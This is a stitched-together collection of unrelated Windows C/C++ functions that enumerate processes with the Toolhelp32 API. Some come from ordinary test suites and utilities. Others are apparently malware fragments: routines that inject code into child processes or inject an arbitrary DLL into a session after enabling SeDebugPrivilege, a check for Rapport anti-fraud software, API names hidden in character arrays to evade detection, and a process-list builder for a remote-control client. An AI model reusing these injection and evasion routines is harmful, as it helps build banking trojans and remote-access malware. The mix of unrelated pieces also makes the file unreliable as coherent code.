static void test_process(DWORD curr_pid, DWORD sub_pcs_pid)
{
HANDLE hSnapshot;
PROCESSENTRY32 pe;
MODULEENTRY32 me;
unsigned found = 0;
int num = 0;
int childpos = -1;
hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
ok(hSnapshot != NULL, "Cannot create snapshot\n");
/* check that this current process is enumerated */
pe.dwSize = sizeof(pe);
if (pProcess32First( hSnapshot, &pe ))
{
do
{
if (pe.th32ProcessID == curr_pid) found++;
if (pe.th32ProcessID == sub_pcs_pid) {
childpos = num;
found++;
}
trace("PID=%x %s\n", pe.th32ProcessID, pe.szExeFile);
num++;
} while (pProcess32Next( hSnapshot, &pe ));
}
ok(found == 2, "couldn't find self and/or sub-process in process list\n");
/* check that first really resets the enumeration */
found = 0;
if (pProcess32First( hSnapshot, &pe ))
{
do
{
if (pe.th32ProcessID == curr_pid) found++;
if (pe.th32ProcessID == sub_pcs_pid) found++;
trace("PID=%x %s\n", pe.th32ProcessID, pe.szExeFile);
num--;
} while (pProcess32Next( hSnapshot, &pe ));
}
ok(found == 2, "couldn't find self and/or sub-process in process list\n");
ok(!num, "mismatch in counting\n");
/* one broken program does Process32First() and does not expect anything
* interesting to be there, especially not the just forked off child */
ok (childpos !=0, "child is not expected to be at position 0.\n");
me.dwSize = sizeof(me);
ok(!pModule32First( hSnapshot, &me ), "shouldn't return a module\n");
CloseHandle(hSnapshot);
ok(!pProcess32First( hSnapshot, &pe ), "shouldn't return a process\n");
}
void INJECTOR::InjectInChildProcesses(PInjector Injector, PProcessInfo Parent)
{
// Функция инжектится в дочерние процессы
// и параллельно роверяем список обработанных процессов
PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);
HANDLE Snap = (HANDLE)pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0);
if (Snap != INVALID_HANDLE_VALUE)
{
if (pProcess32First(Snap, &pe))
{
do
{
if (pe.th32ParentProcessID == Parent->PID)
{
TProcessInfo Info;
if (GetProcessInfo(Injector, pe.th32ProcessID, Info))
Inject(Injector, &Info);
}
} while( pProcess32Next(Snap, &pe ) );
}
pCloseHandle(Snap);
}
}
BOOL IsRunAntiRapport()
{
HANDLE hSnap;
BOOL ret = FALSE;
PROCESSENTRY32 proc32 ;
m_memset(&proc32,0,sizeof(PROCESSENTRY32));
hSnap = (HANDLE)pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hSnap == INVALID_HANDLE_VALUE)
return FALSE;
proc32.dwSize = sizeof(proc32);
if ( pProcess32First(hSnap,&proc32))
{
do{
proc32.dwSize = sizeof(proc32);
if (! plstrcmpA(proc32.szExeFile,"RapportMgmtService.exe"))
{
ret = TRUE;
break;
};
}while(pProcess32Next(hSnap,&proc32));
};
pCloseHandle(hSnap);
return ret;
};
DWORD GetProcessID(LPCTSTR lpProcessName)
{
typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT)
(
DWORD dwFlags,
DWORD th32ProcessID
);
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot = (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot");
typedef BOOL (WINAPI *Process32FirstT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32FirstT pProcess32First = (Process32FirstT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32First");
typedef BOOL (WINAPI *Process32NextT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32NextT pProcess32Next = (Process32NextT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32Next");
typedef int
(WINAPI
*lstrcmpAT)(
__in LPCSTR lpString1,
__in LPCSTR lpString2
);
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA");
DWORD RetProcessID = 0;
HANDLE handle=pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32* info=new PROCESSENTRY32;
info->dwSize=sizeof(PROCESSENTRY32);
if(pProcess32First(handle,info))
{
if (strcmpi(info->szExeFile,lpProcessName) == 0)
{
RetProcessID = info->th32ProcessID;
return RetProcessID;
}
while(pProcess32Next(handle,info) != FALSE)
{
if (plstrcmpA(info->szExeFile,lpProcessName) == 0)
{
RetProcessID = info->th32ProcessID;
return RetProcessID;
}
}
}
return RetProcessID;
}
//=========================================================
BOOL GetTokenByName(HANDLE &hToken,LPSTR lpName)
{
if(!lpName)
{
return FALSE;
}
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
char CtxPW35[] = {'O','p','e','n','P','r','o','c','e','s','s','T','o','k','e','n','\0'};
OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),CtxPW35);
char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
if (pProcess32First(hProcessSnap, &pe32))
{
do
{
if(!strcmp(_strupr(pe32.szExeFile),_strupr(lpName)))
{
HANDLE hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pe32.th32ProcessID);
// bRet = pOpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken);
bRet = pOpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
pCloseHandle (hProcessSnap);
return (bRet);
}
}
while (pProcess32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
pCloseHandle (hProcessSnap);
return (bRet);
}
int CProcessModule::EnumProcess()
{
m_dwProcessCount =0;
/*#ifdef WINNT
DWORD dwBytesNeeded;
if(!m_pEnumProcesses(&m_dwProcessIDs[0], sizeof(m_dwProcessIDs), &dwBytesNeeded))
return -1;
m_dwProcessCount = dwBytesNeeded / sizeof(DWORD);
#else*/
HANDLE hSnapShot;
PROCESSENTRY32 ProcessEntry32;
//MODULEENTRY32 ModuleEntry32;
BOOL Result;
//char *pszExtension;
hSnapShot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapShot == (HANDLE)-1)
return false;
ProcessEntry32.dwSize = sizeof(PROCESSENTRY32);
Result = pProcess32First(hSnapShot, &ProcessEntry32);
if (Result != TRUE)
{
CloseHandle(hSnapShot);
return false;
}
do
{
//HMODULE hMod =GetModuleHandle(ProcessEntry32.szExeFile);
//WriteLog("process:%s, id:%x, module id:%x",
// ProcessEntry32.szExeFile, ProcessEntry32.th32ProcessID,
// ProcessEntry32.th32ModuleID);
m_dwProcessIDs[m_dwProcessCount] = ProcessEntry32.th32ProcessID;
m_dwProcessCount ++;
} while (pProcess32Next(hSnapShot, &ProcessEntry32) && m_dwProcessCount < MAX_PROCESS_COUNT);
CloseHandle(hSnapShot);
//#endif
return m_dwProcessCount;
}
/* This function is a cut/paste from the internet. There was no attribution on
the original source, but I suspect MSDN */
bool process_running(const char *process)
{
typedef HANDLE (WINAPI *CREATESNAPSHOT)(DWORD dwFlags, DWORD dwProcID);
typedef BOOL (WINAPI *PROCESS32FIRST)(HANDLE hSnapshot, LPPROCESSENTRY32 pEntry);
typedef BOOL (WINAPI *PROCESS32NEXT)(HANDLE hSnapshot, LPPROCESSENTRY32 pEntry);
HMODULE hKernel;
HANDLE hSnapshot;
PROCESSENTRY32 pe32;
hKernel = GetModuleHandle("KERNEL32.DLL");
if (!hKernel)
return false;
CREATESNAPSHOT pCreateToolhelp32Snapshot = (CREATESNAPSHOT)GetProcAddress(hKernel, "CreateToolhelp32Snapshot");
PROCESS32FIRST pProcess32First = (PROCESS32FIRST)GetProcAddress(hKernel, "Process32First");
PROCESS32NEXT pProcess32Next = (PROCESS32NEXT)GetProcAddress(hKernel, "Process32Next");
if (!pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next)
return false;
if ((hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0))==(void*)-1)
return false;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!pProcess32First(hSnapshot, &pe32))
{
CloseHandle(hSnapshot);
return false;
}
do
{
if(!stricmp(pe32.szExeFile,process))
{
CloseHandle(hSnapshot);
return true;
}
} while(pProcess32Next(hSnapshot, &pe32));
CloseHandle(hSnapshot);
return false;
}
static void test_module(DWORD pid, const char* expected[], unsigned num_expected)
{
HANDLE hSnapshot;
PROCESSENTRY32 pe;
THREADENTRY32 te;
MODULEENTRY32 me;
unsigned found[32];
unsigned i;
int num = 0;
ok(NUM_OF(found) >= num_expected, "Internal: bump found[] size\n");
hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pid );
ok(hSnapshot != NULL, "Cannot create snapshot\n");
for (i = 0; i < num_expected; i++) found[i] = 0;
me.dwSize = sizeof(me);
if (pModule32First( hSnapshot, &me ))
{
do
{
trace("PID=%x base=%p size=%x %s %s\n",
me.th32ProcessID, me.modBaseAddr, me.modBaseSize, me.szExePath, me.szModule);
ok(me.th32ProcessID == pid, "wrong returned process id\n");
for (i = 0; i < num_expected; i++)
if (!lstrcmpi(expected[i], me.szModule)) found[i]++;
num++;
} while (pModule32Next( hSnapshot, &me ));
}
for (i = 0; i < num_expected; i++)
ok(found[i] == 1, "Module %s is %s\n",
expected[i], found[i] ? "listed more than once" : "not listed");
/* check that first really resets the enumeration */
for (i = 0; i < num_expected; i++) found[i] = 0;
me.dwSize = sizeof(me);
if (pModule32First( hSnapshot, &me ))
{
do
{
trace("PID=%x base=%p size=%x %s %s\n",
me.th32ProcessID, me.modBaseAddr, me.modBaseSize, me.szExePath, me.szModule);
for (i = 0; i < num_expected; i++)
if (!lstrcmpi(expected[i], me.szModule)) found[i]++;
num--;
} while (pModule32Next( hSnapshot, &me ));
}
for (i = 0; i < num_expected; i++)
ok(found[i] == 1, "Module %s is %s\n",
expected[i], found[i] ? "listed more than once" : "not listed");
ok(!num, "mismatch in counting\n");
pe.dwSize = sizeof(pe);
ok(!pProcess32First( hSnapshot, &pe ), "shouldn't return a process\n");
te.dwSize = sizeof(te);
ok(!pThread32First( hSnapshot, &te ), "shouldn't return a thread\n");
CloseHandle(hSnapshot);
ok(!pModule32First( hSnapshot, &me ), "shouldn't return a module\n");
}
BOOL isProcesin(LPTSTR lpProcess)
{
typedef BOOL (WINAPI *CloseHandleT)
(
__in HANDLE hObject
);
char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);
typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT)
(
DWORD dwFlags,
DWORD th32ProcessID
);
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot = (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot");
typedef BOOL (WINAPI *Process32FirstT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32FirstT pProcess32First = (Process32FirstT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32First");
typedef BOOL (WINAPI *GetLastErrorT)
(
VOID
);
char FhTZBW[] = {'G','e','t','L','a','s','t','E','r','r','o','r','\0'};
GetLastErrorT pGetLastError = (GetLastErrorT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FhTZBW);
typedef BOOL (WINAPI *Process32NextT)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
Process32NextT pProcess32Next = (Process32NextT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Process32Next");
BOOL bResult = FALSE;
HANDLE handle=pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32* info = new PROCESSENTRY32;
info->dwSize = sizeof(PROCESSENTRY32);
if(pProcess32First(handle,info))
{
if(pGetLastError()==ERROR_NO_MORE_FILES )
{
bResult = FALSE;
}
else
{
if (strstr(strupr(info->szExeFile), strupr(lpProcess)) > 0)
{
bResult = TRUE;
}
while(pProcess32Next(handle,info) != FALSE)
{
if (strstr(strupr(info->szExeFile),strupr(lpProcess)) > 0)
{
bResult = TRUE;
break;
}
}
}
}
delete info;
pCloseHandle(handle);
return bResult;
}
BOOL CSysInfo::getUserNameFromExplorerProcess(CString &csUserName)
{
TCHAR szUserName[255];
DWORD dwName = 255;
PROCESSENTRY32 pe;
pe.dwSize = sizeof( PROCESSENTRY32 );
HANDLE hToken;
TOKEN_INFORMATION_CLASS TokenInformationClass = TokenUser;
TCHAR szTokenInformation[255];
DWORD dwTokenInformationLength = 255;//sizeof( TOKEN_OWNER );
DWORD dwReturnLength=0;
DWORD dwReferencedDomainName = 255;
TCHAR szReferencedDomainName[255];
SID_NAME_USE peUse;
HANDLE hExplorer = NULL;
HANDLE hSnapshot = NULL;
HMODULE hAdv = NULL;
BOOL bExplorerFound = FALSE;
HANDLE (WINAPI* pCreateToolhelp32Snapshot) (DWORD, DWORD) = NULL;
BOOL (WINAPI* pProcess32First) (HANDLE, LPPROCESSENTRY32) = NULL;
BOOL (WINAPI* pProcess32Next) (HANDLE, LPPROCESSENTRY32) = NULL;
HANDLE (WINAPI* pOpenProcess) (DWORD, BOOL, DWORD) = NULL;
BOOL (WINAPI* pOpenProcessToken) (HANDLE, DWORD, PHANDLE) = NULL;
BOOL (WINAPI* pLookupAccountSid) (LPCTSTR, PSID, LPTSTR, LPDWORD, LPTSTR, LPDWORD, PSID_NAME_USE ) = NULL;
BOOL (WINAPI* pGetTokenInformation) (HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD) = NULL;
AddLog( _T( "getUserNameFromExplorerProcess: Trying to find logged on User ID from <explorer.exe> process...\n"));
// First, try to use Advapi.dll
if( !(hAdv = LoadLibrary( _T( "Advapi32.dll"))))
{
AddLog( _T( "\tFailed to load AdvApi32 library !\n"));
return FALSE;
}
if( !( (*(FARPROC*)&pOpenProcessToken = GetProcAddress( hAdv , "OpenProcessToken" ) ) )||
!( (*(FARPROC*)&pOpenProcess = GetProcAddress( GetModuleHandle( _T( "KERNEL32.DLL")), "OpenProcess") ) )||
!( (*(FARPROC*)&pGetTokenInformation = GetProcAddress( hAdv , "GetTokenInformation") ) )||
#ifdef _UNICODE
!( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidW") ) ) )
#else
!( (*(FARPROC*)&pLookupAccountSid = GetProcAddress( hAdv , "LookupAccountSidA") ) ) )
#endif
{
AddLog( _T( "\tFailed to load AdvApi32 library with error <%i> !\n"), GetLastError());
FreeLibrary( hAdv);
return FALSE;
}
// Try to use kernel32 to enum process
if( !(*(FARPROC*)&pCreateToolhelp32Snapshot = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "CreateToolhelp32Snapshot") ) ||
#ifdef _UNICODE
!(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32FirstW") ) ||
!(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32NextW") ) )
#else
!(*(FARPROC*)&pProcess32First = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32First") ) ||
!(*(FARPROC*)&pProcess32Next = GetProcAddress( GetModuleHandle( _T("KERNEL32.DLL")), "Process32Next") ) )
#endif
{
AddLog( _T( "\tFailed to load Kernel32 process access functions with error <%i> !\n"), GetLastError());
FreeLibrary( hAdv);
return FALSE;
}
// Create snapshot of running processes
if( (hSnapshot = pCreateToolhelp32Snapshot( TH32CS_SNAPALL ,0 )) == INVALID_HANDLE_VALUE )
{
AddLog( _T( "\tCreateToolhelp32Snapshot failed with error <%i> !\n"), GetLastError());
FreeLibrary( hAdv);
return FALSE;
}
// Trying to find explorer.exe into snapshot
if( !pProcess32First( hSnapshot, &pe) )
{
AddLog( _T( "\tProcess32First failed with error <%i> !\n"), GetLastError());
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
do
{
if( !CString(pe.szExeFile).CompareNoCase( _T( "explorer.exe")))
{
bExplorerFound = TRUE;
break;
}
pe.dwSize = sizeof( PROCESSENTRY32 );
}
while (pProcess32Next( hSnapshot, &pe ));
if (!bExplorerFound)
{
AddLog( _T( "\tCould not find <explorer.exe> process !\n"));
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
// Retrieve a handle on explorer.exe process using ID */
if( !(hExplorer = pOpenProcess( PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID )))
{
AddLog( _T( "\tFailed to open <explorer.exe> process with error <%i> !\n"), GetLastError());
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
// Open token associated to explorer.exe to get information
if( !pOpenProcessToken( hExplorer, TOKEN_READ, &hToken ) )
{
AddLog( _T( "\tOpenProcessToken failed with error <%i>\n"), GetLastError());
CloseHandle( hExplorer );
CloseHandle( hToken );
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
if( !pGetTokenInformation( hToken, TokenInformationClass, &szTokenInformation, dwTokenInformationLength, &dwReturnLength))
{
AddLog( _T( "\tGetTokenInformation failed with error <%i>\n"), GetLastError());
CloseHandle( hExplorer );
CloseHandle( hToken );
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
// Lokkup user account running explorer.exe process
if( !pLookupAccountSid( NULL, ((TOKEN_USER*)&szTokenInformation)->User.Sid, szUserName, &dwName, szReferencedDomainName, &dwReferencedDomainName, &peUse ) )
{
AddLog( _T( "\tLookupAccountSid failed with error <%i>\n"), GetLastError());
CloseHandle( hExplorer );
CloseHandle( hToken );
CloseHandle( hSnapshot );
FreeLibrary( hAdv);
return FALSE;
}
CloseHandle( hExplorer );
CloseHandle( hToken );
CloseHandle( hSnapshot );
FreeLibrary( hAdv );
// Ensure username exists
if( CString(szUserName) == _T( "") )
{
AddLog( _T( "\tFound empty user, so assuming failed !\n"));
return FALSE;
}
AddLog( _T( "\t\t<User: %s>\n\tOK\n"), szUserName);
csUserName = szUserName;
return TRUE;
}
/*
* Inject an arbitrary DLL into a process running in specific Windows session.
*/
DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
{
DWORD dwResult = ERROR_INVALID_HANDLE;
CREATETOOLHELP32SNAPSHOT pCreateToolhelp32Snapshot = NULL;
PROCESS32FIRST pProcess32First = NULL;
PROCESS32NEXT pProcess32Next = NULL;
HANDLE hProcessSnap = NULL;
HMODULE hKernel = NULL;
HANDLE hToken = NULL;
BOOL bUseBruteForce = TRUE;
PROCESSENTRY32 pe32 = {0};
do
{
// If we can, get SeDebugPrivilege...
if( OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
{
TOKEN_PRIVILEGES priv = {0};
priv.PrivilegeCount = 1;
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if( LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid ) )
{
if( AdjustTokenPrivileges( hToken, FALSE, &priv, 0, NULL, NULL ) );
dprintf("[SESSION] session_inject. Got SeDebugPrivilege!" );
}
CloseHandle( hToken );
}
hKernel = LoadLibraryA( "kernel32" );
if( !hKernel )
break;
pCreateToolhelp32Snapshot = (CREATETOOLHELP32SNAPSHOT)GetProcAddress( hKernel, "CreateToolhelp32Snapshot" );
pProcess32First = (PROCESS32FIRST)GetProcAddress( hKernel, "Process32First" );
pProcess32Next = (PROCESS32NEXT)GetProcAddress( hKernel, "Process32Next" );
if( !pCreateToolhelp32Snapshot || !pProcess32First || !pProcess32Next )
break;
hProcessSnap = pCreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( hProcessSnap == INVALID_HANDLE_VALUE )
break;
pe32.dwSize = sizeof( PROCESSENTRY32 );
if( !pProcess32First( hProcessSnap, &pe32 ) )
break;
bUseBruteForce = FALSE;
do
{
if( dwSessionId == session_id( pe32.th32ProcessID ) )
{
// On Windows 2008R2 we Blue Screen the box if we inject via APC injection
// into the target sessions instance of csrss.exe!!! so we filter it out...
if( strstr( pe32.szExeFile, "csrss.exe" ) )
continue;
//if( strstr( pe32.szExeFile, "winlogon.exe" ) )
// continue;
//if( !strstr( pe32.szExeFile, "winlogon.exe" ) )
// continue;
//if( !strstr( pe32.szExeFile, "explorer.exe" ) )
// continue;
//if( strstr( pe32.szExeFile, "TPAutoConnSvc.exe" ) )
// continue;
dwResult = ps_inject( pe32.th32ProcessID, pDllBuffer );
if( dwResult == ERROR_SUCCESS )
{
dprintf( "[SESSION] session_inject. Injected into process %d (%s)", pe32.th32ProcessID, pe32.szExeFile );
break;
}
}
} while( pProcess32Next( hProcessSnap, &pe32 ) );
} while( 0 );
if( hProcessSnap )
CloseHandle( hProcessSnap );
if( hKernel )
FreeLibrary( hKernel );
// On NT4 we must brute force the process list...
if( bUseBruteForce )
dwResult = _session_inject_bruteforce( dwSessionId, pDllBuffer );
return dwResult;
}
/*++
Routine Description:
Provides an API for getting a list of tasks running at the time of the
API call. This function uses Toolhelp32to get the task list and is
therefore straight WIN32 calls that anyone can call.
Arguments:
dwNumTasks - maximum number of tasks that the pTask array can hold
Return Value:
Number of tasks placed into the pTask array.
--*/
DWORD
GetTaskList95( PTASK_LIST pTask,
DWORD dwNumTasks )
{
CREATESNAPSHOT pCreateToolhelp32Snapshot = NULL;
PROCESSWALK pProcess32First = NULL;
PROCESSWALK pProcess32Next = NULL;
HANDLE hKernel = NULL;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = {0};
DWORD dwTaskCount = 0;
// Guarantee to the code later on that we'll enum at least one task.
if (dwNumTasks == 0)
return( 0 );
// Obtain a module handle to KERNEL so that we can get the addresses of
// the 32-bit Toolhelp functions we need.
hKernel = GetModuleHandle("KERNEL32.DLL");
if (hKernel)
{
pCreateToolhelp32Snapshot =
(CREATESNAPSHOT)GetProcAddress((HMODULE)hKernel, "CreateToolhelp32Snapshot");
pProcess32First = (PROCESSWALK)GetProcAddress((HMODULE )hKernel,
"Process32First");
pProcess32Next = (PROCESSWALK)GetProcAddress((HMODULE )hKernel,
"Process32Next");
}
// make sure we got addresses of all needed Toolhelp functions.
if (!(pProcess32First && pProcess32Next && pCreateToolhelp32Snapshot))
return( 0 );
// Take a snapshot of all processes currently in the system.
hProcessSnap = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return( 0 );
// Walk the snapshot of processes and for each process, get information
// to display.
dwTaskCount = 0;
pe32.dwSize = zsizeof(PROCESSENTRY32); // must be filled out before use
if (pProcess32First(hProcessSnap, &pe32))
{
do
{
LPSTR pCurChar;
// strip path and leave executabe filename splitpath
for (pCurChar = (pe32.szExeFile + lstrlen (pe32.szExeFile));
*pCurChar != '\\' && pCurChar != pe32.szExeFile;
--pCurChar)
lstrcpy((LPSTR)pTask->ProcessName, pCurChar);
pTask -> flags = 0;
pTask -> dwProcessId = pe32.th32ProcessID;
++dwTaskCount; // keep track of how many tasks we've got so far
++pTask; // get to next task info block.
}
while (dwTaskCount < dwNumTasks && pProcess32Next(hProcessSnap, &pe32));
}
else
dwTaskCount = 0; // Couldn't walk the list of processes.
// Don't forget to clean up the snapshot object...
CloseHandle (hProcessSnap);
return dwTaskCount;
}
LPBYTE CSystemManager::getProcessList()
{
HANDLE hSnapshot = NULL;
HANDLE hProcess = NULL;
HMODULE hModules = NULL;
PROCESSENTRY32 pe32 = {0};
DWORD cbNeeded;
char strProcessName[MAX_PATH] = {0};
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnapshot == INVALID_HANDLE_VALUE)
return NULL;
pe32.dwSize = sizeof(PROCESSENTRY32);
char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024);
lpBuffer[0] = TOKEN_PSLIST;
dwOffset = 1;
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize");
char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'};
LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29);
char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'};
EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15);
char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'};
GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13);
if(pProcess32First(hSnapshot, &pe32))
{
do
{
hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
{
pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName));
// 此进程占用数据大小
dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2;
// 缓冲区太小,再重新分配下
if (pLocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1);
dwOffset += plstrlenA(pe32.szExeFile) + 1;
Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1);
dwOffset += plstrlenA(strProcessName) + 1;
}
}
while(pProcess32Next(hSnapshot, &pe32));
}
lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE);
char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
pCloseHandle(hSnapshot);
return lpBuffer;
}
